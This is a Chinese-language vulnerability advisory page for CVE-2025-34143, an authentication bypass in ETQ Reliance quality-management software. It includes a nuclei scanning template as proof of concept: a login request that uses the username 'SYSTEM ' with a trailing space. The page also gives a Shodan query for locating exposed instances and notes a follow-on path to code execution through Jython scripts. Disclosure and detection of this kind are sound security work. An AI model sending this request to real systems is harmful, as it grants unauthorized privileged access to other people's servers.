ETQ Reliance Authentication Bypass via Trailing Space

漏洞信息

漏洞名称: ETQ Reliance Authentication Bypass via Trailing Space

漏洞编号:

  • CVE: CVE-2025-34143

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: ETQ Reliance是一款企业级的质量管理软件,广泛应用于制造业和服务业,用于跟踪和管理质量流程、合规性和审计。该软件在CG(legacy)平台上存在认证绕过漏洞,允许攻击者通过操纵用户名字段以特权内部SYSTEM用户身份登录。SYSTEM账户不需要密码,这意味着任何能够访问登录页面的网络攻击者都可以获得提升的访问权限。一旦认证成功,攻击者可以通过修改应用程序中的Jython脚本实现远程代码执行。此漏洞的技术根源在于应用程序未能对用户名输入进行严格的验证,允许通过添加尾随空格等方式绕过认证机制。该漏洞的影响极为严重,因为它不仅允许未经授权的用户获得系统的高权限访问,还可能被用于进一步的攻击,如数据泄露、服务中断等。此漏洞在版本MP-4583中通过引入更严格的验证逻辑来排除内部账户从公共认证流程中得到修复。

产品厂商: ETQ

产品名称: ETQ Reliance

影响版本: version before MP-4583

搜索语法: html:”ETQ Reliance”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/9bb1dad95dfd00bea8378195c1cd652a6bb3059c/http%2Fcves%2F2025%2FCVE-2025-34143.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: CVE-2025-34143

info:
  name: ETQ Reliance Authentication Bypass via Trailing Space
  author: slcyber,DhiyaneshDK
  severity: critical
  description: |
    An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.
  reference:
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: etq-reliance,auth-bypass

variables:
  username: "SYSTEM "
  password: "{{to_lower(rand_text_alphanumeric(7))}}"

http:
  - raw:
      - |
        POST /reliance/resources/sessions HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "statusCode"
          - "userId"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
ETQ Reliance Authentication Bypass via Trailing Space
http://example.com/2025/07/23/github_2054692129/
作者
lianccc
发布于
2025年7月23日
许可协议